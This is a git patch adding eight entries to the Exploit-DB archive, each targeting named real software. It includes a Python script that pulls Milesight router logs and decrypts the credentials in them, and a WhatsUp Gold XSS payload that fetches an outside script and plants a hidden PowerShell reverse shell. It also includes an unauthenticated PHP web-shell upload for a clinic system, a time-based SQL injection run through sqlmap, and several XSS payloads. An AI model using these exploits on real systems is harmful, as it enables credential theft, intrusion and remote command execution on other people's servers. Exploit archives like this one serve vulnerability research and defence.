From 0c65b881bae76cfb2287b359deb6df38f2512077 Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Tue, 6 Feb 2024 00:16:29 +0000 Subject: [PATCH] DB: 2024-02-06 10 changes to exploits/shellcodes/ghdb Milesight Routers UR5X_ UR32L_ UR32_ UR35_ UR41 - Credential Leakage Through Unprotected System Logs and Weak Password Encryption WhatsUp Gold 2022 (22.1.0 Build 39) - XSS Clinic's Patient Management System 1.0 - Unauthenticated RCE Curfew e-Pass Management System 1.0 - FromDate SQL Injection GYM MS - GYM Management System - Cross Site Scripting (Stored) MISP 2.4.171 - Stored XSS TASKHUB-2.8.8 - XSS-Reflected Wordpress 'simple urls' Plugin < 115 - XSS --- exploits/hardware/remote/51784.py | 81 ++++++++++++++++ exploits/multiple/webapps/51781.txt | 139 ++++++++++++++++++++++++++++ exploits/php/webapps/51777.txt | 36 +++++++ exploits/php/webapps/51778.txt | 20 ++++ exploits/php/webapps/51779.txt | 101 ++++++++++++++++++++ exploits/php/webapps/51780.txt | 17 ++++ exploits/php/webapps/51782.txt | 29 ++++++ exploits/php/webapps/51783.txt | 24 +++++ files_exploits.csv | 8 ++ ghdb.xml | 21 ++++- 10 files changed, 473 insertions(+), 3 deletions(-) create mode 100755 exploits/hardware/remote/51784.py create mode 100644 exploits/multiple/webapps/51781.txt create mode 100644 exploits/php/webapps/51777.txt create mode 100644 exploits/php/webapps/51778.txt create mode 100644 exploits/php/webapps/51779.txt create mode 100644 exploits/php/webapps/51780.txt create mode 100644 exploits/php/webapps/51782.txt create mode 100644 exploits/php/webapps/51783.txt diff --git a/exploits/hardware/remote/51784.py b/exploits/hardware/remote/51784.py new file mode 100755 index 0000000000..952a7a2732 --- /dev/null +++ b/exploits/hardware/remote/51784.py @@ -0,0 +1,81 @@ +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- + +""" +Title: Credential Leakage Through Unprotected System Logs and Weak Password Encryption +CVE: CVE-2023-43261 +Script Author: Bipin Jitiya (@win3zz) +Vendor: Milesight IoT - https://www.milesight-iot.com/ (Formerly Xiamen Ursalink Technology Co., Ltd.) +Software/Hardware: UR5X, UR32L, UR32, UR35, UR41 and there might be other Industrial Cellular Router could also be vulnerable. +Script Tested on: Ubuntu 20.04.6 LTS with Python 3.8.10 +Writeup: https://medium.com/@win3zz/inside-the-router-how-i-accessed-industrial-routers-and-reported-the-flaws-29c34213dfdf +""" + +import sys +import requests +import re +import warnings +from Crypto.Cipher import AES # pip install pycryptodome +from Crypto.Util.Padding import unpad +import base64 +import time + +warnings.filterwarnings("ignore") + +KEY = b'1111111111111111' +IV = b'2222222222222222' + +def decrypt_password(password): + try: + return unpad(AES.new(KEY, AES.MODE_CBC, IV).decrypt(base64.b64decode(password)), AES.block_size).decode('utf-8') + except ValueError as e: + display_output(' [-] Error occurred during password decryption: ' + str(e), 'red') + +def display_output(message, color): + colors = {'red': '\033[91m', 'green': '\033[92m', 'blue': '\033[94m', 'yellow': '\033[93m', 'cyan': '\033[96m', 'end': '\033[0m'} + print(f"{colors[color]}{message}{colors['end']}") + time.sleep(0.5) + +urls = [] + +if len(sys.argv) == 2: + urls.append(sys.argv[1]) + +if len(sys.argv) == 3 and sys.argv[1] == '-f': + with open(sys.argv[2], 'r') as file: + urls.extend(file.read().splitlines()) + +if len(urls) == 0: + display_output('Please provide a URL or a file with a list of URLs.', 'red') + display_output('Example: python3 ' + sys.argv[0] + ' https://example.com', 'blue') + display_output('Example: python3 ' + sys.argv[0] + ' -f urls.txt', 'blue') + sys.exit() + +use_proxy = False +proxies = {'http': 'http://127.0.0.1:8080/'} if use_proxy else None + +for url in urls: + display_output('[*] Initiating data retrieval for: ' + url + '/lang/log/httpd.log', 'blue') + response = requests.get(url + '/lang/log/httpd.log', proxies=proxies, verify=False) + + if response.status_code == 200: + display_output('[+] Data retrieval successful for: ' + url + '/lang/log/httpd.log', 'green') + data = response.text + credentials = set(re.findall(r'"username":"(.*?)","password":"(.*?)"', data)) + + num_credentials = len(credentials) + display_output(f'[+] Found {num_credentials} unique credentials for: ' + url, 'green') + + if num_credentials > 0: + display_output('[+] Login page: ' + url + '/login.html', 'green') + display_output('[*] Extracting and decrypting credentials for: ' + url, 'blue') + display_output('[+] Unique Credentials:', 'yellow') + for i, (username, password) in enumerate(credentials, start=1): + display_output(f' Credential {i}:', 'cyan') + decrypted_password = decrypt_password(password.encode('utf-8')) + display_output(f' - Username: {username}', 'green') + display_output(f' - Password: {decrypted_password}', 'green') + else: + display_output('[-] No credentials found in the retrieved data for: ' + url, 'red') + else: + display_output('[-] Data retrieval failed. Please check the URL: ' + url, 'red') \ No newline at end of file diff --git a/exploits/multiple/webapps/51781.txt b/exploits/multiple/webapps/51781.txt new file mode 100644 index 0000000000..6f6e0ad177 --- /dev/null +++ b/exploits/multiple/webapps/51781.txt @@ -0,0 +1,139 @@ +# Exploit Title: WhatsUpGold 22.1.0 - Stored Cross-Site Scripting (XSS) +# Date: April 18, 2023 +# Exploit Author: Andreas Finstad (4ndr34z) +# Vendor Homepage: https://www.whatsupgold.com +# Version: v.22.1.0 Build 39 +# Tested on: Windows 2022 Server +# CVE : CVE-2023-35759 +# Reference: https://nvd.nist.gov/vuln/detail/CVE-2023-35759 + + + +WhatsUp Gold 2022 (22.1.0 Build 39) + +Stored XSS in sysName SNMP parameter. + + +Vulnerability Report: Stored XSS in WhatsUp Gold 2022 (22.1.0 Build 39) +Product Name: WhatsUp Gold 2022 +Version: 22.1.0 Build 39 +Vulnerability Type: Stored Cross-Site Scripting (XSS) + +Description: +WhatsUp Gold 2022 is vulnerable to a stored cross-site scripting (XSS) attack that allows an attacker to inject malicious scripts into the admin console. The vulnerability exists in the sysName SNMP field on a device, which reflects the input from the SNMP device into the admin console after being discovered by SNMP. + +An attacker can exploit this vulnerability by crafting a specially crafted SNMP device name that contains malicious code. Once the device name is saved and reflected in the admin console, the injected code will execute in the context of the admin user, potentially allowing the attacker to steal sensitive data or perform unauthorized actions. + +As there is no CSRF tokens or CDP, it is trivial to create a javascript payload that adds an scheduled action on the server, that executes code as "NT System". In my POC code, I add a Powershell revshell that connects out to the attacker every 5 minutes. (screenshot3) + +The XSS trigger when clicking the "All names and addresses" + +Stage: + +Base64 encoded id property: +var a=document.createElement("script");a.src="https://f20.be/t.js";document.body.appendChild(a); + +Staged payload placed in the SNMP sysName Field on a device: + + +payload: + +var vhost = window.location.protocol+'\/\/'+window.location.host + +addaction(); +async function addaction() { +var arguments = '' +let run = fetch(vhost+'/NmConsole/api/core/WugPowerShellScriptAction?_dc=1655327281064',{ + method: 'POST', + headers: { + 'Connection': 'close', + 'Content-Length': '1902', + 'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"', + 'Accept': 'application/json', + 'Content-Type': 'application/json', + 'X-Requested-With': 'XMLHttpRequest', + 'sec-ch-ua-mobile': '?0', + 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33', + 'sec-ch-ua-platform': '"macOS"', + 'Sec-Fetch-Mode': 'cors', + 'Sec-Fetch-Dest': 'empty', + 'Accept-Encoding': 'gzip, deflate', + 'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4' + }, + credentials: 'include', + body: '{"id":-1,"Timeout":30,"ScriptText":"Start-process powershell -argumentlist \\"-W Hidden -noprofile -executionpolicy bypass -NoExit -e JAB0AG0AcAAgAD0AIABAACgAJwBzAFkAUwB0AGUATQAuAG4ARQB0AC4AcwBPAGMAJwAsACcASwBFAHQAcwAuAHQAQwBQAEMAbABJAGUAbgB0ACcAKQA7ACQAdABtAHAAMgAgAD0AIABbAFMAdAByAGkAbgBnAF0AOgA6AEoAbwBpAG4AKAAnACcALAAkAHQAbQBwACkAOwAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAkAHQAbQBwADIAKAAnADEAOQAyAC4AMQA2ADgALgAxADYALgAzADUAJwAsADQANAA0ADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACgAJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQApACAAKwAgACcAQAAnACAAKwAgACgAJABlAG4AdgA6AFUAcwBlAHIARABvAG0AYQBpAG4AKQAgACsAIAAoAFsAUwB5AHMAdABlAG0ALgBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATgBlAHcATABpAG4AZQApACAAKwAgACgAZwBlAHQALQBsAG8AYwBhAHQAaQBvAG4AKQArACcAPgAnADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==\\" -NoNewWindow","ScriptImpersonateFlag":false,"ClsId":"5903a09a-cce6-11e0-8f66-fe544824019b","Description":"Evil script","Name":"Systemtask"}' +}); + + +setTimeout(() => { getactions(); }, 1000); + +}; + + + +async function getactions() { + +const response = await fetch(vhost+'/NmConsole/api/core/WugAction?_dc=4',{ + method: 'GET', + headers: { + 'Connection': 'close', + 'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"', + 'Accept': 'application/json', + 'Content-Type': 'application/json', + 'X-Requested-With': 'XMLHttpRequest', + 'sec-ch-ua-mobile': '?0', + 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33', + 'sec-ch-ua-platform': '"macOS"', + 'Sec-Fetch-Site': 'same-origin', + 'Sec-Fetch-Mode': 'cors', + 'Sec-Fetch-Dest': 'empty', + 'Accept-Encoding': 'gzip, deflate', + 'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4' + }, + credentials: 'include' + +}); +const actions = await response.json(); +var results = []; +var searchField = "Name"; +var searchVal = "Systemtask"; +for (var i=0 ; i < actions.length ; i++) +{ + if (actions[i][searchField] == searchVal) { + results.push(actions[i].Id); + revshell(results[0]) + + } +} +//console.log(actions); + +}; + + +async function revshell(ID) { +fetch(vhost+'/NmConsole/Configuration/DlgRecurringActionLibrary/DlgSchedule/DlgSchedule.asp',{ + method: 'POST', + headers: { + 'Connection': 'close', + 'Content-Length': '2442', + 'Cache-Control': 'max-age=0', + 'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"', + 'sec-ch-ua-mobile': '?0', + 'sec-ch-ua-platform': '"macOS"', + 'Upgrade-Insecure-Requests': '1', + 'Origin': 'https://192.168.16.100', + 'Content-Type': 'application/x-www-form-urlencoded', + 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', + 'Sec-Fetch-Site': 'same-origin', + 'Sec-Fetch-Mode': 'navigate', + 'Sec-Fetch-User': '?1', + 'Sec-Fetch-Dest': 'iframe', + 'Referer': 'https://192.168.16.100/NmConsole/Configuration/DlgRecurringActionLibrary/DlgSchedule/DlgSchedule.asp', + 'Accept-Encoding': 'gzip, deflate', + 'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4' + }, + credentials: 'include', + body: 'DlgSchedule.oCheckBoxEnableSchedule=on&DlgSchedule.ScheduleType=DlgSchedule.oRadioButtonInterval&DlgSchedule.oEditIntervalMinutes=5&ShowAspFormDialog.VISITEDFORM=visited&DlgRecurringActionGeneral.oEditName=test&DlgRecurringActionGeneral.oComboSelectActionType=21&DlgRecurringActionGeneral.DIALOGRETURNURL=%2FNmConsole%2F%24Nm%2FCore%2FForm-AspForms%2Finc%2FShowAspFormDialog.asp&DlgRecurringActionGeneral.SAVEDFORMSTATE=%253cSavedFormState%253e%253cFormVariables%253e%253coElement%2520sName%3D%2522__VIEWSTATE%2522%2520sValue%3D%2522%25253cViewState%2F%25253e%0D%0A%2522%2F%253e%253c%2FFormVariables%253e%253cQueryStringVariables%2F%253e%253c%2FSavedFormState%253e&DlgRecurringActionGeneral.VISITEDFORM=visited%2C+visited&DlgSchedule.DIALOGRETURNURL=%2FNmConsole%2F%24Nm%2FCore%2FForm-AspForms%2Finc%2FShowAspFormDialog.asp&DlgSchedule.SAVEDFORMSTATE=%253cSavedFormState%253e%253cFormVariables%253e%253coElement%2520sName%3D%2522__VIEWSTATE%2522%2520sValue%3D%2522%25253cViewState%2F%25253e%0D%0A%2522%2F%253e%253c%2FFormVariables%253e%253cQueryStringVariables%2F%253e%253c%2FSavedFormState%253e&__EVENTTYPE=ButtonPressed&__EVENTTARGET=DlgSchedule.oButtonFinish&__EVENTARGUMENT=&DlgSchedule.VISITEDFORM=visited&__SOURCEFORM=DlgSchedule&__VIEWSTATE=%253cViewState%253e%253coElement%2520sName%3D%2522DlgRecurringActionGeneral.RecurringAction-sMode%2522%2520sValue%3D%2522new%2522%2F%253e%253coElement%2520sName%3D%2522RecurringAction-nActionTypeID%2522%2520sValue%3D%2522'+ID+'%2522%2F%253e%253coElement%2520sName%3D%2522Date_nStartOfWeek%2522%2520sValue%3D%25220%2522%2F%253e%253coElement%2520sName%3D%2522Date_sMediumDateFormat%2522%2520sValue%3D%2522MMMM%2520dd%2C%2520yyyy%2522%2F%253e%253coElement%2520sName%3D%2522DlgSchedule.sWebUserName%2522%2520sValue%3D%2522admin%2522%2F%253e%253coElement%2520sName%3D%2522DlgRecurringActionGeneral.sWebUserName%2522%2520sValue%3D%2522admin%2522%2F%253e%253coElement%2520sName%3D%2522DlgSchedule.RecurringAction-sMode%2522%2520sValue%3D%2522new%2522%2F%253e%253coElement%2520sName%3D%2522RecurringAction-sName%2522%2520sValue%3D%2522test%2522%2F%253e%253coElement%2520sName%3D%2522Date_bIs24HourTime%2522%2520sValue%3D%25220%2522%2F%253e%253c%2FViewState%253e%0D%0A&DlgSchedule.oEditDay=&DlgSchedule.oComboSelectMonthHour=0&DlgSchedule.oComboSelectMonthMinute=0&DlgSchedule.oComboSelectMonthAmPm=0&DlgSchedule.oComboSelectWeekHour=0&DlgSchedule.oComboSelectWeekMinute=0&DlgSchedule.oComboSelectWeekAmPm=0' +}); +}; \ No newline at end of file diff --git a/exploits/php/webapps/51777.txt b/exploits/php/webapps/51777.txt new file mode 100644 index 0000000000..6f78058673 --- /dev/null +++ b/exploits/php/webapps/51777.txt @@ -0,0 +1,36 @@ +# Exploit Title: GYM MS - GYM Management System - Cross Site Scripting (Stored) +# Date: 29/09/2023 +# Vendor Homepage: https://phpgurukul.com/gym-management-system-using-php-and-mysql/ +# Software Link: https://phpgurukul.com/projects/GYM-Management-System-using-PHP.zip +# Version: 1.0 +# Last Update: 31 August 2022 +# Tested On: Kali Linux 6.1.27-1kali1 (2023-05-12) x86_64 + XAMPP 7.4.30 + +# 1: Create user, login and go to profile.php + +# 2: Use payload x%22%20onmouseover%3Dalert%28document.cookie%29%20x%3D%22 in lname field. + +# 3: When entering the profile.php page, document.cookie will be reflected every time. + +# Author +This vulnerability was detected by Alperen Yozgat while testing with the Rapplex - Web Application Security Scanner. + +# About Rapplex +Rapplex is a web applicaton security scanner that scans and reports vulnerabilities in websites. +Pentesters can use it as an automation tool for daily tasks but "Pentester Studio" will provide such a great addition as well in their manual assessments. +So, the software does not need separate development tools to discover different types of vulnerabilities or to develop existing engines. +"Exploit" tools are available to take advantage of vulnerabilities such as SQL Injection, Code Injection, Fle Incluson. + + +# HTTP Request + +POST /gym/profile.php HTTP/1.1 +Host: localhost +Content-Length: 129 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Cookie: PHPSESSID=76e2048c174c1a5d46e203df87672c25 #CHANGE +Connection: close + +fname=test&lname=x%22%20onmouseover%3Dalert%28document.cookie%29%20x%3D%22&email=john%40test.com&mobile=1425635241&state=Delhi&city=New+Delhi&address=ABC+Street+XYZ+Colony&submit=Update \ No newline at end of file diff --git a/exploits/php/webapps/51778.txt b/exploits/php/webapps/51778.txt new file mode 100644 index 0000000000..e3390d9390 --- /dev/null +++ b/exploits/php/webapps/51778.txt @@ -0,0 +1,20 @@ +# Exploit Title: Curfew e-Pass Management System 1.0 - FromDate SQL +Injection +# Date: 28/9/2023 +# Exploit Author: Puja Dey +# Vendor Homepage: https://phpgurukul.com +# Software Link: +https://phpgurukul.com/curfew-e-pass-management-system-using-php-and-mysql/ +# Version: 1.0 +# Tested on: Windows 10/Wamp + +1) login into the application +2) click on report on pass and capture the request in burpsuite +3) Parameter "FromDate" is vulnerable to SQL Injection +Parameter: #1* ((custom) POST) + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: fromdate=' AND (SELECT 6290 FROM (SELECT(SLEEP(5)))Kdfl) AND +'SOzQ'='SOzQ&todate=&submit= +4) Put '*' in the value for the parameter and save the item as cpme +5) Run sqlmap -r cpme --batch --dbs --random-agent \ No newline at end of file diff --git a/exploits/php/webapps/51779.txt b/exploits/php/webapps/51779.txt new file mode 100644 index 0000000000..57ddaa035c --- /dev/null +++ b/exploits/php/webapps/51779.txt @@ -0,0 +1,101 @@ +# Exploit Title: Clinic's Patient Management System 1.0 - Unauthenticated RCE +# Date: 07.10.2023 +# Exploit Author: Oğulcan Hami Gül +# Vendor Homepage: https://www.sourcecodester.com/php-clinics-patient-management-system-source-code +# Software Link: https://www.sourcecodester.com/download-code?nid=15453&title=Clinic%27s+Patient+Management+System+in+PHP%2FPDO+Free+Source+Code +# Version: 1.0 +# Tested on: Windows 10 + +## Unauthenticated users can access /pms/users.php address and they can upload malicious php file instead of profile picture image without any authentication. + +POST /pms/users.php HTTP/1.1 + +Host: 192.168.1.36 + +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 + +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 + +Accept-Language: en-US,en;q=0.5 + +Accept-Encoding: gzip, deflate, br + +Content-Type: multipart/form-data; boundary=---------------------------421755697017784551042596452367 + +Content-Length: 1054 + +Origin: http://192.168.1.36 + +Connection: close + +Referer: http://192.168.1.36/pms/users.php + +Upgrade-Insecure-Requests: 1 + + + +-----------------------------421755697017784551042596452367 + +Content-Disposition: form-data; name="display_name" + + + +sefa7 + +-----------------------------421755697017784551042596452367 + +Content-Disposition: form-data; name="user_name" + + + +sefa7 + +-----------------------------421755697017784551042596452367 + +Content-Disposition: form-data; name="password" + + + +sefa7 + +-----------------------------421755697017784551042596452367 + +Content-Disposition: form-data; name="profile_picture"; filename="simple-backdoor.php" + +Content-Type: application/x-php + + + + + +"; + $cmd = ($_REQUEST['cmd']); + system($cmd); + echo ""; + die; +} + +?> + +Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd + + + + +-----------------------------421755697017784551042596452367 + +Content-Disposition: form-data; name="save_user" + + + + + +-----------------------------421755697017784551042596452367-- + + +## After the file upload request sent by attacker, Application adds a random number to the beginning of the file to be uploaded. Malicious file can be seen under the path /pms/users.php without any authentication. + +## With the request http://192.168.1.36/pms/user_images/1696676940simple-backdoor.php?cmd=whoami the attacker can execute arbitrary command on the application server. \ No newline at end of file diff --git a/exploits/php/webapps/51780.txt b/exploits/php/webapps/51780.txt new file mode 100644 index 0000000000..a75ffa580e --- /dev/null +++ b/exploits/php/webapps/51780.txt @@ -0,0 +1,17 @@ +# Exploit Title: MISP 2.4.171 Stored XSS [CVE-2023-37307] (Authenticated) +# Date: 8th October 2023 +# Exploit Author: Mücahit Çeri +# Vendor Homepage: https://www.circl.lu/ +# Software Link: https://github.com/MISP/MISP +# Version: 2.4.171 +# Tested on: Ubuntu 20.04 +# CVE : CVE-2023-37307 + +# Exploit: +Logged in as low privileged account + +1)Click on the "Galaxies" button in the top menu +2)Click "Add Cluster" in the left menu. +3)Enter the payload "" in the Name parameter. +4)Other fields are filled randomly. Click on Submit button. +5)When the relevant cluster is displayed, we see that alert(1) is running \ No newline at end of file diff --git a/exploits/php/webapps/51782.txt b/exploits/php/webapps/51782.txt new file mode 100644 index 0000000000..9911d9d151 --- /dev/null +++ b/exploits/php/webapps/51782.txt @@ -0,0 +1,29 @@ +## Title: TASKHUB-2.8.8-XSS-Reflected +## Author: nu11secur1ty +## Date: 09/22/2023 +## Vendor: https://codecanyon.net/user/infinitietech +## Software: https://codecanyon.net/item/taskhub-project-management-finance-crm-tool/25685874 +## Reference: https://portswigger.net/web-security/cross-site-scripting + + +## Description: +The value of the JSON parameter within the project parameter is copied +into the HTML document as plain text between tags. The payload +vn5mri62kl was submitted in the JSON +parameter within the project parameter. This input was echoed +unmodified in the application's response. The already authenticated +(by using a USER ACCOUNT)attacker can get a CSRF token and cookie +session it depends on the scenarios. + +[+]Test exploit: +surw7%3Cscript%3Ealert(1)%3C%2fscript%3E + +## Reproduce: +[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/infinitietech/TASKHUB-2.8.8) + +## Proof and Exploit: +[href](https://www.nu11secur1ty.com/2023/09/taskhub-288-xss-reflected.html) + +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +home page: https://www.nu11secur1ty.com/ \ No newline at end of file diff --git a/exploits/php/webapps/51783.txt b/exploits/php/webapps/51783.txt new file mode 100644 index 0000000000..5c9ca0f4b8 --- /dev/null +++ b/exploits/php/webapps/51783.txt @@ -0,0 +1,24 @@ +# Exploit Title: simple urls < 115 XSS +# Google Dork: +# Exploit Author: AmirZargham +# Vendor Homepage: https://getlasso.co/ +# Software Link: https://wordpress.org/plugins/simple-urls/ +# Version: < 115 +# Tested on: firefox,chrome +# CVE: CVE-2023-0099 +# CWE: CWE-79 +# Platform: MULTIPLE +# Type: WebApps + + +Description +The Simple URLs WordPress plugin before 115 does not sanitise and escape +some parameters before outputting them back in some pages, leading to +Reflected Cross-Site Scripting. + + +Usage Info: + +send malicious link to victim: +https://vulnerable.com/wp-content/plugins/simple-urls/admin/assets/js/import-js.php?search= + \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 3ba9c7364e..9e63b69a4e 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -3754,6 +3754,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 44284,exploits/hardware/remote/44284.py,"MikroTik RouterOS < 6.38.4 (x86) - 'Chimay Red' Stack Clash Remote Code Execution",2018-03-12,"Lorenzo Santina",remote,hardware,,2018-03-13,2018-03-13,0,,,,,,https://github.com/BigNerd95/Chimay-Red/tree/36faf04e9ffb224811e0ac074a62126fdca7a92f 44290,exploits/hardware/remote/44290.py,"MikroTik RouterOS < 6.41.3/6.42rc27 - SMB Buffer Overflow",2018-03-15,CoreLabs,remote,hardware,,2018-03-16,2018-03-16,0,CVE-2018-7445,,,,,https://www.reddit.com/r/netsec/comments/84o6ki/mikrotik_routeros_smb_buffer_overflow/ 46444,exploits/hardware/remote/46444.txt,"MikroTik RouterOS < 6.43.12 (stable) / < 6.42.12 (long-term) - Firewall and NAT Bypass",2019-02-21,"Jacob Baines",remote,hardware,,2019-02-21,2019-02-21,1,CVE-2019-3924,,,,, +51784,exploits/hardware/remote/51784.py,"Milesight Routers UR5X_ UR32L_ UR32_ UR35_ UR41 - Credential Leakage Through Unprotected System Logs and Weak Password Encryption",2024-02-05,"Bipin Jitiya",remote,hardware,,2024-02-05,2024-02-05,0,,,,,, 51094,exploits/hardware/remote/51094.txt,"MiniDVBLinux 5.4 - Change Root Password",2023-03-27,LiquidWorm,remote,hardware,,2023-03-27,2023-03-27,0,,,,,, 51096,exploits/hardware/remote/51096.py,"MiniDVBLinux 5.4 - Remote Root Command Injection",2023-03-27,LiquidWorm,remote,hardware,,2023-03-27,2023-03-27,0,,,,,, 51097,exploits/hardware/remote/51097.py,"MiniDVBLinux 5.4 - Arbitrary File Read",2023-03-27,LiquidWorm,remote,hardware,,2023-03-27,2023-03-27,0,,,,,, @@ -12279,6 +12280,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 44403,exploits/multiple/webapps/44403.rb,"WebRTC - Private IP Leakage (Metasploit)",2018-04-05,"Dhiraj Mishra",webapps,multiple,,2018-04-05,2018-04-05,0,CVE-2018-6849,,,,, 50542,exploits/multiple/webapps/50542.txt,"Webrun 3.6.0.42 - 'P_0' SQL Injection",2021-11-23,"Vinicius Alves",webapps,multiple,,2021-11-23,2022-04-22,0,CVE-2021-43650,,,,, 48295,exploits/multiple/webapps/48295.txt,"WhatsApp Desktop 0.3.9308 - Persistent Cross-Site Scripting",2020-04-06,"Gal Weizman",webapps,multiple,,2020-04-06,2020-04-06,0,CVE-2019-18426,,,,, +51781,exploits/multiple/webapps/51781.txt,"WhatsUp Gold 2022 (22.1.0 Build 39) - XSS",2024-02-05,"Andreas Finstad",webapps,multiple,,2024-02-05,2024-02-05,0,,,,,, 50366,exploits/multiple/webapps/50366.txt,"WhatsUpGold 21.0.3 - Stored Cross-Site Scripting (XSS)",2021-10-01,"Andreas Finstad",webapps,multiple,,2021-10-01,2021-10-01,0,CVE-2021-41318,,,,, 10821,exploits/multiple/webapps/10821.txt,"Wing FTP Server 3.2.4 - Cross-Site Request Forgery",2009-12-30,Ams,webapps,multiple,,2009-12-29,,0,,,,,, 48154,exploits/multiple/webapps/48154.sh,"Wing FTP Server 6.2.5 - Privilege Escalation",2020-03-02,"Cary Hooper",webapps,multiple,,2020-03-02,2020-03-02,0,,,,,, @@ -15787,6 +15789,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 50439,exploits/php/webapps/50439.py,"Clinic Management System 1.0 - SQL injection to Remote Code Execution",2021-10-22,"Pablo Santiago",webapps,php,,2021-10-22,2021-11-29,0,,,,,, 48544,exploits/php/webapps/48544.txt,"Clinic Management System 1.0 - Unauthenticated Remote Code Execution",2020-06-04,BKpatron,webapps,php,,2020-06-04,2020-06-04,0,,,,,, 46642,exploits/php/webapps/46642.txt,"Clinic Pro v4 - 'month' SQL Injection",2019-04-03,"Abdullah Çelebi",webapps,php,80,2019-04-03,2019-04-03,0,,"SQL Injection (SQLi)",,,, +51779,exploits/php/webapps/51779.txt,"Clinic's Patient Management System 1.0 - Unauthenticated RCE",2024-02-05,"Oğulcan Hami Gül",webapps,php,,2024-02-05,2024-02-05,0,,,,,, 9255,exploits/php/webapps/9255.txt,"Clip Bucket 1.7.1 - Insecure Cookie Handling",2009-07-24,Qabandi,webapps,php,,2009-07-23,,1,,,,,, 12383,exploits/php/webapps/12383.txt,"clipak - Arbitrary File Upload",2010-04-25,indoushka,webapps,php,,2010-04-24,,1,,,,,, 44346,exploits/php/webapps/44346.rb,"ClipBucket - 'beats_uploader' Arbitrary File Upload (Metasploit)",2018-03-27,Metasploit,webapps,php,,2018-03-27,2018-03-27,1,,"Metasploit Framework (MSF)",,,http://www.exploit-db.comclipbucket-4881.zip,https://raw.githubusercontent.com/rapid7/metasploit-framework/80c4d59560f0d596231f4dc2718bce25ff9bd00f/modules/exploits/multi/http/clipbucket_fileupload_exec.rb @@ -16506,6 +16509,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 40343,exploits/php/webapps/40343.txt,"CumulusClips 